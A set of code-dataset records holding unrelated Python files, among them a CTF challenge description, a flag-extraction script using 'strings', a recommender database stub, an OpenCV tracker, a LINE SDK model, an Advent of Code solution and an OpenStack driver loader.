e53e1359ada1e7abcdeff9e0c1d64916715d6e0b | dd381750b40d26b188f090a5c621e045d266e5b2 | /ctf-scripts/hacklu2014/pwn300-holy-mose.py | 596e8ff604fd355bb3a119bcdcb228bd372f55b5 | [] | no_license | huyna/sftc | dceac0c183d76c3647f0610b06e671edca7d4d60 | 69852e066a29e4a7ace3fc4c89c902924be97db6 | refs/heads/master | 2021-01-10T10:09:54.566089 | 2015-11-20T02:40:54 | 2015-11-20T02:40:54 | 46,462,927 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | __author__ = 'HuyNA'
'''
The craziest saloon in town, called Holy Moses, is throwing one of their crazy parties again.
As usually they have a special VIP area, with the hottest people, free drinks and a private band.
Each time you hear people talking about it how crazy and amazing it was.
But to gain access to the area you need a special invite code and unfortunately for you, you don't know anybody to get you one.
But you are lucky, they have a online service running to enter referal codes and request an invite code.
Maybe the programmer did a crappy job
and you find a way to gain access to the server and retrieve the invite code (file called 'flag').
Good luck.
service running at: nc wildwildweb.fluxfingers.net 1405
''' | [
"huyna89@hotmail.com"
] | huyna89@hotmail.com |
85e8933aa80d8f2d5d05d32dc0c057ca837c753a | fe0cd921f2bb325834d735e76d023ac7dbd9bb75 | /DatabaseInterface.py | b08f1850d7c4ea725b578c737d523ff3b3431149 | [] | no_license | hamemomo/recommend_system | 350a35a3872993a34b6b21109591ed7cbc7d1888 | 1a320130506e0b3d8e305bf87627cbd0a2cde54a | refs/heads/master | 2020-08-27T22:22:09.241805 | 2019-10-25T09:57:24 | 2019-10-25T09:57:24 | 217,504,106 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,540 | py | # Database Interface
# to simulate some database operations
import os
import pandas as pd
import logging
class DatabaseInterface(object):
logging.basicConfig(level=logging.INFO)
# in reality, it should be a configuration file
HISTORY = "ratings.csv"
USER_FEATURE = "userFeature.csv"
ITEM_FEATURE = "itemFeature.csv"
INVENTORY = "inventory.csv" #in reality, inventory store all the representations, such as video link
HISTORY_KEY = "history"
USER_FEATURE_KEY = "user_feature"
ITEM_FEATURE_KEY = "item_feature"
INVENTORY_KEY = "inventory"
USER_ACTIVITY_KEY = "user_activity"
# register the static database first
dbTable = {HISTORY_KEY: HISTORY,
USER_FEATURE_KEY: USER_FEATURE,
ITEM_FEATURE_KEY: ITEM_FEATURE,
INVENTORY_KEY: INVENTORY}
def __init__(self, path):
self.log = logging.getLogger(__name__)
self.path = path
self.started = False
self.connTable = {}
def startEngine(self):
if self.started:
self.log.warning("the data base has already started")
# start a running engine is not permitted here since it will remove all unsaved data
else:
self.log.info("start the database engine...")
for tableName, tablePath in self.dbTable.items():
print("tablename = ",tableName,"-------tablepath = ",tablePath)
self.log.info("loading table %s..." % tableName)
self.connTable[tableName] = pd.read_csv(os.path.join(self.path, tablePath), index_col=0)
self.log.info("creating table user_activity...")
self.connTable[self.USER_ACTIVITY_KEY] = self.connTable["history"].groupby("user_id").size() # actually a series
self.log.info("database successfully started")
self.started = True
# ideally a sql should be used to query a database, in this case, pandas operation will used instead in client
# https://pandas.pydata.org/pandas-docs/stable/comparison_with_sql.html
def extract(self, tableName):
return self.connTable[tableName]
def putAction(self, action):
insertRow(self.connTable[self.HISTORY_KEY], [action.userId, action.itemId, action.rating])
def insertRow(df,row):
# unsafe insertion into pandas dataframe
df.loc[len(df)] = row
if __name__ == "__main__":
connector = DatabaseInterface("DATA")
connector.startEngine()
df1 = connector.connTable["history"]
print (df1.head())
df2 = connector.connTable["user_activity"]
print (df2[10])
df3 = connector.connTable["item_feature"]
print (df3.loc[:,"unknown":])
df4 = connector.connTable["user_feature"]
print (df4.loc[:,"age":])
print (set(df1[df1.loc[:,"user_id"]==2].loc[:,"item_id"]))
| [
"Jim@email.com"
] | Jim@email.com |
b626b508122d65548f0ae58b5d22a240ad38f1e4 | 4ead088355078df170fac48b50c08f304b5ecda0 | /easy_solved/solution.py | fb4956740c056d12057ac7d453370ae1c7491bb3 | [
"MIT"
] | permissive | UndeadRat22/LASACTF2016 | 385ad939cdbf58925a2683db59b016ca312409de | 157d62b8d29042f3162c37680d4b78ab234b7b76 | refs/heads/master | 2020-03-24T14:50:43.998232 | 2018-10-20T18:18:06 | 2018-10-20T18:18:06 | 142,778,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | import requests
import re
from subprocess import check_output as cmd
fileurl = "https://raw.githubusercontent.com/LASACTF/LASACTF-Problems/master/Problems/Reverse%20Engineering/easy/easy.exe"
filename = "easy.exe"
def download(url):
resp = requests.get(fileurl)
if (resp.status_code == 200):
return resp.content
if (__name__ == "__main__"):
filedata = download(fileurl)
if (not filedata):
exit(-1)
with open(filename, "wb") as file:
file.write(filedata)
try:
result = cmd(["strings", filename])
except Exception as e:
print("could not parse the file {} using strings!".format(filename))
print(e)
if (not result):
exit(-1)
flags = re.findall(r"lasactf{(.*)}", str(result))
print(flags[0][:17]) | [
"noreply@github.com"
] | UndeadRat22.noreply@github.com |
99c176efd11b74b9d69be376b3a77f6b0ec21b35 | 0c02476560f181542225a27cded203e0a158a661 | /python/meanshift.py | e00efd34b66fa416f4f580e79e9080f5293b6f94 | [] | no_license | siddharthdeore/ComputerVision | 7eaeab66beea43e6691eb75f969d7c3f704940af | 2e42dd0e84da61ac259d9b89fbaee96aef24da05 | refs/heads/master | 2021-01-19T03:08:27.251106 | 2017-04-06T11:02:56 | 2017-04-06T11:02:56 | 87,306,521 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,371 | py | import numpy as np
import cv2
frame = None
roiPts = []
inputMode = False
# Getting the camera reference
cap = cv2.VideoCapture(0)
#cap = cv2.VideoCapture('http://192.168.2.114:8080/video?x.mjpg')
# Callback function to get the ROI by clicking into four points
def click_and_crop(event, x, y, flags, param):
# grab the reference to the current frame, list of ROI
# points and whether or not it is ROI selection mode
global frame, roiPts, inputMode
# if we are in ROI selection mode, the mouse was clicked,
# and we do not already have four points, then update the
# list of ROI points with the (x, y) location of the click
# and draw the circle
if inputMode and event == cv2.EVENT_LBUTTONDOWN and len(roiPts) < 4:
roiPts.append((x, y))
cv2.circle(frame, (x, y), 4, (255, 0, 0), 1)
cv2.imshow("image", frame)
# Attaching the callback into the video window
cv2.namedWindow("image")
cv2.setMouseCallback("image", click_and_crop)
# Setup the termination criteria, either 10 iteration or move by atleast 1 pt
term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 20, 10 )
roiBox = None
print "Enter character i and select 4 points near object to track"
# Main loop
while(1):
ret ,frame = cap.read()
if roiBox is not None:
# Making the frame into HSV and backproject the HSV frame
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([hsv],[0],roi_hist,[0,180],1)
# Apply meanshift to get the new location
ret, roiBox = cv2.CamShift(dst, roiBox, term_crit)
# Draw it on image
pts = cv2.cv.BoxPoints(ret)
pts = np.int0(pts)
cv2.polylines(frame,[pts],True, (255,255,0),2)
# Draw the center
cx = (pts[0][0]+pts[1][0])/2
cy = (pts[0][1]+pts[2][1])/2
cv2.circle(frame, (cx, cy), 4, (0, 255, 255), 1)
#cv2.imshow('img2',frame)
# handle if the 'i' key is pressed, then go into ROI
# selection mode
cv2.imshow("image", frame)
key = cv2.waitKey(1) & 0xFF
# if key == ord("i") and len(roiPts) < 4:
if key == ord("i"):
# indicate that we are in input mode and clone the
# frame
inputMode = True
orig = frame.copy()
roiPts = []
# keep looping until 4 reference ROI points have
# been selected; press any key to exit ROI selction
# mode once 4 points have been selected
while len(roiPts) < 4:
cv2.imshow("image", frame)
cv2.waitKey(0)
# determine the top-left and bottom-right points
roiPts = np.array(roiPts)
s = roiPts.sum(axis = 1)
tl = roiPts[np.argmin(s)]
br = roiPts[np.argmax(s)]
# grab the ROI for the bounding box and convert it
# to the HSV color space
roi = orig[tl[1]:br[1], tl[0]:br[0]]
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
# compute a HSV histogram for the ROI and store the
# bounding box
roi_hist = cv2.calcHist([roi], [0], None, [16], [0, 180])
roi_hist = cv2.normalize(roi_hist, roi_hist, 0, 255, cv2.NORM_MINMAX)
roiBox = (tl[0], tl[1], br[0], br[1])
inputmode = False
# k = cv2.waitKey(60) & 0xff
if key == 27:
break
cv2.destroyAllWindows()
cap.release()
| [
"noreply@github.com"
] | siddharthdeore.noreply@github.com |
549d26bdfebb26f7e41ffa553e48b04e054ae011 | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/insight/models/get_statistics_per_unit_response_overview.py | 8dead06a2e9bdba632aa7f0ff33642dfff6804fd | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 4,122 | py | # coding: utf-8
"""
LINE Messaging API(Insight)
This document describes LINE Messaging API(Insight). # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import Optional
from pydantic.v1 import BaseModel, Field, StrictInt
class GetStatisticsPerUnitResponseOverview(BaseModel):
"""
Statistics related to messages.
https://developers.line.biz/en/reference/messaging-api/#get-statistics-per-unit-response
"""
unique_impression: Optional[StrictInt] = Field(None, alias="uniqueImpression", description="Number of users who opened the message, meaning they displayed at least 1 bubble.")
unique_click: Optional[StrictInt] = Field(None, alias="uniqueClick", description="Number of users who opened any URL in the message.")
unique_media_played: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed", description="Number of users who started playing any video or audio in the message.")
unique_media_played100_percent: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed100Percent", description="Number of users who played the entirety of any video or audio in the message.")
__properties = ["uniqueImpression", "uniqueClick", "uniqueMediaPlayed", "uniqueMediaPlayed100Percent"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# set to None if unique_impression (nullable) is None
# and __fields_set__ contains the field
if self.unique_impression is None and "unique_impression" in self.__fields_set__:
_dict['uniqueImpression'] = None
# set to None if unique_click (nullable) is None
# and __fields_set__ contains the field
if self.unique_click is None and "unique_click" in self.__fields_set__:
_dict['uniqueClick'] = None
# set to None if unique_media_played (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played is None and "unique_media_played" in self.__fields_set__:
_dict['uniqueMediaPlayed'] = None
# set to None if unique_media_played100_percent (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played100_percent is None and "unique_media_played100_percent" in self.__fields_set__:
_dict['uniqueMediaPlayed100Percent'] = None
return _dict
@classmethod
def from_dict(cls, obj: dict) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return GetStatisticsPerUnitResponseOverview.parse_obj(obj)
_obj = GetStatisticsPerUnitResponseOverview.parse_obj({
"unique_impression": obj.get("uniqueImpression"),
"unique_click": obj.get("uniqueClick"),
"unique_media_played": obj.get("uniqueMediaPlayed"),
"unique_media_played100_percent": obj.get("uniqueMediaPlayed100Percent")
})
return _obj
| [
"noreply@github.com"
] | line.noreply@github.com |
18208e0e8472a9a979844ccc86b91d2486e2c4bd | be9213551cec52e4cd299450cbd8fae6ee3718f8 | /Estudos/Phyton/Exemplos/ex_1.py | 9c7fd252ac757cd27b6abefd8f1f899508b27ede | [] | no_license | jopape/Projects | 923fc432b12add0d48ce08ba2ed8d4f03fe65fa0 | e941892838763102ef79322202d4d10a92afadfe | refs/heads/master | 2021-01-16T22:57:55.189357 | 2012-12-14T15:13:16 | 2012-12-14T15:13:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | print "Hello World!"
print "Hello Again"
print "I like typing this."
print "This is fun."
print 'Yay! Printing.'
print "I'd much rather you 'not'." | [
"harumi_tominaga@hotmail.com"
] | harumi_tominaga@hotmail.com |
3a8187647befc71d2cbcf0f4b1bafa6ded704304 | c6e3e46e386999a333ff6c04e0dda01a387b2a2e | /PythonPrograms/Physics/Pracs/JJAbrahamICT4.py | 6953ddb51bbea551f3cadcabb4dbf18c81bc2674 | [] | no_license | FreddyManston/Misc | 6bcc25247fbb3738e46bc2a78bea8ced2adb7c62 | 4d6f257ee75047cb239e6d0341df6a95f0197007 | refs/heads/master | 2021-06-21T23:16:22.320479 | 2020-11-15T20:26:51 | 2020-11-15T20:26:51 | 133,033,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,328 | py | # Author: Joshua J. Abraham
# Student No.: 3475896
# Date: 13/08/2015
# Description: Estimates the y-intercept between two points, using one of three methods
def bisection(x1, x2):
while (abs(x1 - x2) >= 10**-5):
x3 = (x1 + x2) / 2 # Midpoint
if (f(x1) * f(x3) < 0):
x2 = x3
else:
x1 = x3
print ("Midpoint is: " + str(x3) + ". With a tolerance of 10^-5")
def sectant(x1, x2):
if (abs(f(x1)) < abs(f(x2))):
temp = x1
x1 = x2
x2 = temp
x3 = x2 - ((f(x2) * (x1 - x2)) / (f(x1) - f(x2)))
while (abs(f(x3)) < 10**-5):
x3 = x2 - ((f(x2) * (x1 - x2)) / (f(x1) - f(x2)))
x1 = x2
x2 = x3
print ("Midpoint is: " + str(x3) + ". With a tolerance of 10^-5")
def newton(x1):
if (f(x1) != 0 and f_prime(x1) != 0):
while (abs(f(x1)) >= 10**-5):
x2 = x1
x1 = x1 - (f(x1) / f_prime(x1))
print ("Midpoint is: " + str(x1) + ". With a tolerance of 10^-5")
def f(x):
return x**3 + 4*x - 10
def f_prime(x):
return 3*x**2 + 4
print ("\nWhich algorithm would you like to use? Type in the number.")
print ("1) Bisection \n2) Sectant \n3) Newton's technique")
choice = input("Type in your choice: ")
if choice == 1:
bisection(1.0, 2.0)
elif choice == 2:
sectant(1.0, 2.0)
elif choice == 3:
newton(1.0)
else:
print ("Invalid input. Exiting.") | [
"freddymanston@gmail.com"
] | freddymanston@gmail.com |
07668a1f866d382975faa194303b687ba0b4523d | f30a13b0399cfb2ef759c40a9c326d8c0adf864d | /brew/__init__.py | 188c94a8fb19d432d5bf4985024f067c6003c634 | [
"MIT"
] | permissive | glemaitre/brew | e424f4b06e53f908207507878ac19d9a30c2bb42 | 513da26c6437be5437273ae22f702d45d4b9bfe1 | refs/heads/master | 2021-04-15T07:09:16.736987 | 2016-06-28T11:50:31 | 2016-06-28T11:50:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | __author__ = 'Dayvid Victor <victor.dvro@gmail.com>, Thyago Porpino <thyago.porpino@gmail.com>'
__email__='brew-python-devs@googlegroups.com',
__version__ = '0.1.3'
from brew.base import Ensemble, EnsembleClassifier
__all__ = ['Ensemble',
'EnsembleClassifier']
| [
"victor.dvro@gmail.com"
] | victor.dvro@gmail.com |
5159225c0da48ffee4128a8f320257f6fd54c027 | 192b040fb4487d4634c41cdf9c66042853749937 | /colat/utils/net_utils.py | 7a7779793ea99d6ebbe84439cc208456d7e36450 | [] | no_license | kkodoo/latentclr | f62dbdb50d3a9ad0cd3869618c973d88cf4406fb | f5e88ee90f5c5dc38a42972117acf419dfa39da9 | refs/heads/main | 2023-08-29T10:24:46.831681 | 2021-10-11T19:32:25 | 2021-10-11T19:32:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | from collections import OrderedDict
import torch
def create_mlp(
depth: int,
in_features: int,
middle_features: int,
out_features: int,
bias: bool = True,
batchnorm: bool = True,
final_norm: bool = False,
):
# initial dense layer
layers = []
layers.append(
(
"linear_1",
torch.nn.Linear(
in_features, out_features if depth == 1 else middle_features
),
)
)
# iteratively construct batchnorm + relu + dense
for i in range(depth - 1):
layers.append(
(f"batchnorm_{i+1}", torch.nn.BatchNorm1d(num_features=middle_features))
)
layers.append((f"relu_{i+1}", torch.nn.ReLU()))
layers.append(
(
f"linear_{i+2}",
torch.nn.Linear(
middle_features,
out_features if i == depth - 2 else middle_features,
False if i == depth - 2 else bias,
),
)
)
if final_norm:
layers.append(
(f"batchnorm_{depth}", torch.nn.BatchNorm1d(num_features=out_features))
)
# return network
return torch.nn.Sequential(OrderedDict(layers))
| [
"okyksl@gmail.com"
] | okyksl@gmail.com |
8384bf2d6d10476e56073926954322e7f293947f | 7b7e956178f090b91c08b7908665ea88bbffebd5 | /venv/Scripts/easy_install-3.7-script.py | e368cf62a699209ce62e97e2fccad0c934e6ca55 | [] | no_license | MaDMikeNsk/First_TKINTER_App | f0a2ef88d2cdd97c93e266868e323099af667510 | 6d3e7a2fb70754bfaf9dbf855de6cc92e97fc1d4 | refs/heads/master | 2020-09-13T01:20:33.781738 | 2019-11-19T08:52:01 | 2019-11-19T08:52:01 | 222,619,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | #!C:\Python\PycharmProjects\First_TKINTER_App\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
# Auto-generated setuptools console-script wrapper; not meant to be
# edited by hand.  It resolves the 'easy_install-3.7' entry point from
# the pinned setuptools distribution and runs it.
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the '-script.py(w)' / '.exe' suffix that Windows launchers
    # append, so the entry point sees a clean program name in argv[0].
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        # The entry point's return value becomes the process exit status.
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
    )
| [
"mikemenshikov85@gmail.com"
] | mikemenshikov85@gmail.com |
0c3a69db6b7dde4d69970997de1238cf5226cc63 | db2ec9bb0df2f721edcbdf3199642838ef575cfa | /segmentation/ECSSD.py | 3c8aaf97bd830801ae2fea20ec49f307ec473629 | [] | no_license | racheltang2333/Graviti | d15c73201bae771264cf463c6df1515f877bc743 | 8fa13d81503ef2bb81a2158de56b54f12c7d9da4 | refs/heads/main | 2023-08-14T10:17:23.356714 | 2021-09-11T14:59:28 | 2021-09-11T14:59:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | import os
from tensorbay.client import config
from tensorbay.dataset import Data
from common.dataset_initial import INITIAL
# One-shot script: upload the local ECSSD saliency dataset to TensorBay.
# Harden the TensorBay client's request timeout and retry count.
config.timeout = 40
config.max_retries = 4
dataset_name = "ECSSD"
# Windows-style local path to the downloaded dataset.
root_path = "G:\\download_dataset\\ECSSD"
imgs_fileName = [x for x in os.listdir(os.path.join(root_path, "images")) if x.endswith(".jpg")]
# NOTE(review): masks_fileName is computed but never used below -- the
# ground-truth masks are not uploaded.  Confirm whether that is intended.
masks_fileName = [x for x in os.listdir(os.path.join(root_path, "ground_truth_mask")) if x.endswith(".png")]
initial = INITIAL(root_path, dataset_name, [], [])
gas, dataset = initial.generate_catalog()
# All images go into a single segment named "train&test".
segment = dataset.create_segment("train&test")
for img_fileName in imgs_fileName:
    img_path = os.path.join(root_path, "images\\" + img_fileName)
    data = Data(img_path)
    segment.append(data)
# Upload with 12 parallel jobs, then create the first commit.
dataset_client = gas.upload_dataset(dataset, jobs=12)
dataset_client.commit("Initial commit")
| [
"wanshantian@gmail.com"
] | wanshantian@gmail.com |
9a64ec6a72966090f86eda4bc0c90f01e8f55658 | 708b596778ccb1df05d15e2efd44a74be37f38cd | /chap1/q4.py | 4ba21e901d999c4e44fa9c47ce366aa241bb4565 | [] | no_license | japanesemankind/100knock | 943aa51e9d4d0fcbc3b27f01ea24785a843a4ab8 | c90d7274557706d50098fac59b4305b04080eb90 | refs/heads/master | 2023-06-20T06:09:48.007229 | 2021-07-21T06:40:36 | 2021-07-21T06:40:36 | 357,402,880 | 0 | 1 | null | 2021-05-19T09:23:38 | 2021-04-13T02:41:11 | Jupyter Notebook | UTF-8 | Python | false | false | 515 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import re
def q4(str_arg):
    """Map element-symbol prefixes of a mnemonic sentence to word positions.

    Splits *str_arg* into words (commas and periods removed).  Words at the
    0-based positions in ``single_letter`` contribute their first letter,
    all other words their first two letters (matching the periodic table's
    one- vs two-letter symbols).  Returns a dict ``{prefix: position}``.
    """
    # Positions whose word yields a one-letter symbol (H, B, C, N, O, F, P, S, K).
    # A set gives O(1) membership instead of scanning a list per word.
    single_letter = {0, 4, 5, 6, 7, 8, 14, 15, 18}
    words = re.sub(r',|\.', '', str_arg).split()
    # Avoid shadowing the builtin `dict` (the original used it as a variable).
    symbols = {}
    for idx, word in enumerate(words):
        prefix = word[0:1] if idx in single_letter else word[0:2]
        symbols[prefix] = idx
    return symbols
# Demo: print the element-symbol table for the standard mnemonic sentence.
print(q4("Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can"))
# In[ ]:
| [
"matsuno.takumi.gf@tut.jp"
] | matsuno.takumi.gf@tut.jp |
97d15d6f45852f8ad8f5576eff06fea5cb1089b3 | 43cbef9a8b7424fb7144255d1d9494be828e3b4c | /nes_randomizer/registration/urls.py | a6c54bd79ab683e6b46d4559d9fdcb440476523a | [] | no_license | thebmo/NESRandomizer | 59135814c3dd23d948af1f5ce7ca236c8f96dc56 | 1bad8c3ba8ed2a513f3ecd7005023f063fc3ba1f | refs/heads/master | 2020-07-05T08:19:02.916233 | 2015-11-03T03:34:32 | 2015-11-03T03:34:32 | 22,393,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django.conf.urls import patterns, url
from . import views
# Route the app root ('') to the registration view.
# NOTE(review): uses the old-style Django patterns() syntax (removed in
# Django 1.10); fine for the Django version this project pins.
urlpatterns = patterns('',
    url(r'^$', views.register, name='register'),
)
| [
"bmosier@gmail.com"
] | bmosier@gmail.com |
4f87b4ca7c3aa6e8268b5586166ac8fa4ad2bb6d | 190cf3017501d87c30cb584aac80bd79bbd4b26a | /day17-2.py | 642beb9c3de970f88cb9c9ebb11473116184eceb | [] | no_license | Maxtasy/adventofcode2020 | 9aedcb641c43010639904162dbc9195bb2b27ee8 | 76b3ca457fe491daeb118c5ec3d5bb9113bbf967 | refs/heads/master | 2023-02-14T14:40:57.439873 | 2020-12-22T16:00:57 | 2020-12-22T16:00:57 | 317,533,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,712 | py | #https://adventofcode.com/2020/day/17
from collections import defaultdict
from copy import deepcopy
# Number of automaton steps the puzzle asks to simulate.
CYCLES = 6
def active_neighbor_count(hyperplane, coord):
    """Count the active cells among the 80 4-D neighbors of *coord*.

    *hyperplane* is a defaultdict keyed by (w, z, y, x) tuples; looking a
    neighbor up inserts a default False entry, matching the original
    behavior exactly.
    """
    cw, cz, cy, cx = coord
    offsets = range(-1, 2)
    total = 0
    for dw in offsets:
        for dz in offsets:
            for dy in offsets:
                for dx in offsets:
                    if dw == 0 and dz == 0 and dy == 0 and dx == 0:
                        continue  # the cell itself is not its own neighbor
                    if hyperplane[(cw + dw, cz + dz, cy + dy, cx + dx)]:
                        total += 1
    return total
def part2(input_file):
    """Advent of Code 2020, day 17 part 2.

    Simulates CYCLES steps of the 4-D Conway-cubes automaton and returns
    the number of active cells at the end.

    input_file: path to the puzzle input -- a 2-D grid of '#' (active)
    and '.' (inactive) that seeds the slice w == 0, z == 0.
    """
    with open(input_file, "r") as f:
        lines = f.read().strip().split("\n")
    # Sparse 4-D grid: coordinates that were never touched read as False.
    hyperplane = defaultdict(lambda: False)
    # Seed the grid from the 2-D slice and record its bounding box.
    current_min_w = current_max_w = 0
    current_min_z = current_max_z = 0
    current_min_y, current_max_y = 0, len(lines) - 1
    current_min_x, current_max_x = 0, max(len(line) for line in lines) - 1
    for y, line in enumerate(lines):
        for x, char in enumerate(line):
            if char == "#":
                hyperplane[(0, 0, y, x)] = True
    for _ in range(CYCLES):
        # Activity can spread at most one cell per cycle in each direction,
        # so widen the bounding box by exactly one on BOTH sides, once per
        # cycle.  (Bug fix: the original re-derived the bounds from leftover
        # loop variables inside the scan, which never grew the negative side
        # correctly and did redundant min/max work per cell.)
        current_min_w -= 1
        current_max_w += 1
        current_min_z -= 1
        current_max_z += 1
        current_min_y -= 1
        current_max_y += 1
        current_min_x -= 1
        current_max_x += 1
        # Freeze the current generation; the rules read only from the copy.
        hyperplane_copy = deepcopy(hyperplane)
        for w in range(current_min_w, current_max_w + 1):
            for z in range(current_min_z, current_max_z + 1):
                for y in range(current_min_y, current_max_y + 1):
                    for x in range(current_min_x, current_max_x + 1):
                        coord = (w, z, y, x)
                        active_neighbors = active_neighbor_count(hyperplane_copy, coord)
                        if hyperplane_copy[coord] and active_neighbors not in (2, 3):
                            hyperplane[coord] = False
                        elif not hyperplane_copy[coord] and active_neighbors == 3:
                            hyperplane[coord] = True
    # Count the active cells in the final generation.
    return sum(1 for coord in hyperplane if hyperplane[coord])
def main():
    """Entry point: solve part 2 for the default puzzle input and print it."""
    print(part2("day17-input.txt"))
if __name__ == "__main__":
main() | [
"maxtasy88@web.de"
] | maxtasy88@web.de |
46605773042e4694045207282c63666f3ac7d88a | b5550fc728b23cb5890fd58ccc5e1668548dc4e3 | /network/security_group/openstack_driver.py | 9717ba421b4a63ea98d5328cfd53bec9b7f01766 | [] | no_license | bopopescu/nova-24 | 0de13f078cf7a2b845cf01e613aaca2d3ae6104c | 3247a7199932abf9718fb3260db23e9e40013731 | refs/heads/master | 2022-11-20T00:48:53.224075 | 2016-12-22T09:09:57 | 2016-12-22T09:09:57 | 282,140,423 | 0 | 0 | null | 2020-07-24T06:24:14 | 2020-07-24T06:24:13 | null | UTF-8 | Python | false | false | 1,631 | py | #coding:utf-8
# Copyright 2013 Nicira, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common import importutils
# Config option choosing the security-group API implementation: 'nova',
# 'neutron'/'quantum', or a fully qualified class path (see
# get_openstack_security_group_driver below).
security_group_opts = [
    cfg.StrOpt('security_group_api',
               default='nova',
               help='The full class name of the security API class'),
]
CONF = cfg.CONF
CONF.register_opts(security_group_opts)
# Implementation classes behind the 'nova' and 'neutron'/'quantum'
# shorthand values of the option above.
NOVA_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
               'NativeNovaSecurityGroupAPI')
NEUTRON_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
                  'NativeNeutronSecurityGroupAPI')
def get_openstack_security_group_driver():
    """Instantiate the security-group API driver selected by config.

    'nova' and 'neutron'/'quantum' are shorthands for the bundled
    drivers; any other value is treated as a fully qualified class path.
    """
    api = CONF.security_group_api.lower()
    if api == 'nova':
        driver = NOVA_DRIVER
    elif api in ('neutron', 'quantum'):
        driver = NEUTRON_DRIVER
    else:
        driver = CONF.security_group_api
    return importutils.import_object(driver)
def is_neutron_security_groups():
    """Return True when Neutron (a.k.a. Quantum) backs the security-group API."""
    api_name = CONF.security_group_api.lower()
    return api_name in ('neutron', 'quantum')
| [
"719184289@qq.com"
] | 719184289@qq.com |
0d8cf3d920dc76f0c4b05c2d553f6846e4799bcb | edc80b253c0ad88a421f7cd341d695e601fde73d | /utils.py | 1194f99c9f18970a5625febf931cca1ec72e84ff | [
"MIT"
] | permissive | prashantramangupta/snet-platform-usage | 62cc4061326e89ca39c1b3105362fc4b4fb9509c | 41b0669ebebf116012f312a333d0b3cbcdcf8519 | refs/heads/master | 2022-11-04T23:57:35.611828 | 2022-10-13T05:03:05 | 2022-10-13T05:03:05 | 177,531,350 | 1 | 1 | MIT | 2022-10-12T10:20:37 | 2019-03-25T06:56:31 | Python | UTF-8 | Python | false | false | 1,607 | py | import json
import datetime
import decimal
import requests
from constant import SLACK_HOOK
# Bookkeeping columns stripped from result rows before serialization.
IGNORED_LIST = ['row_id', 'row_created', 'row_updated']
class Utils:
def __init__(self):
self.msg_type = {
0 : 'info:: ',
1 : 'err:: '
}
def report_slack(self, type, slack_msg):
url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']
prefix = self.msg_type.get(type, "")
print(url)
payload = {"channel": "#contract-index-alerts",
"username": "webhookbot",
"text": prefix + slack_msg,
"icon_emoji": ":ghost:"
}
resp = requests.post(url=url, data=json.dumps(payload))
print(resp.status_code, resp.text)
def clean(self, value_list):
for value in value_list:
self.clean_row(value)
def clean_row(self, row):
for item in IGNORED_LIST:
del row[item]
for key in row:
if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):
row[key] = str(row[key])
elif isinstance(row[key], bytes):
if row[key] == b'\x01':
row[key] = 1
